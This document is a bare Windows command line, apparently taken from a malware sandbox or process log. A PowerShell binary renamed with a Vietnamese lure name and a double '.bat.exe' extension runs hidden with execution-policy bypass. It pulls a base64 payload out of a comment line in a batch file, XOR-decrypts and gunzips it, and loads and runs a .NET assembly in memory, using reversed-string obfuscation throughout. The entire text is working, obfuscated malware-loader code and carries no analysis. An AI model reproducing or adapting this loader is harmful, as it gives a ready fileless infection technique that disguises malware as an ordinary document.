"NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_qqhtM = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat').Split([Environment]::NewLine);foreach ($_CASH_AEOoF in $_CASH_qqhtM) { if ($_CASH_AEOoF.StartsWith(':: @')) { $_CASH_ZdXkn = $_CASH_AEOoF.Substring(4); break; }; };$_CASH_ZdXkn = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZdXkn, '_CASH_', '');$_CASH_ESBhW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZdXkn);$_CASH_AWnhq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3P6bK+LzjI7DUzZz5IAWC2F46OSMzFByN+j5nJV7ZMY=');for ($i = 0; $i -le $_CASH_ESBhW.Length - 1; $i++) { $_CASH_ESBhW[$i] = ($_CASH_ESBhW[$i] -bxor $_CASH_AWnhq[$i % $_CASH_AWnhq.Length]); };$_CASH_FcYnt = New-Object System.IO.MemoryStream(, $_CASH_ESBhW);$_CASH_woGME = New-Object System.IO.MemoryStream;$_CASH_CdINX = New-Object System.IO.Compression.GZipStream($_CASH_FcYnt, [IO.Compression.CompressionMode]::Decompress);$_CASH_CdINX.CopyTo($_CASH_woGME);$_CASH_CdINX.Dispose();$_CASH_FcYnt.Dispose();$_CASH_woGME.Dispose();$_CASH_ESBhW = $_CASH_woGME.ToArray();$_CASH_aAcgv = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_ESBhW);$_CASH_fNVRV = $_CASH_aAcgv.EntryPoint;$_CASH_fNVRV.Invoke($null, (, [string[]] ('')))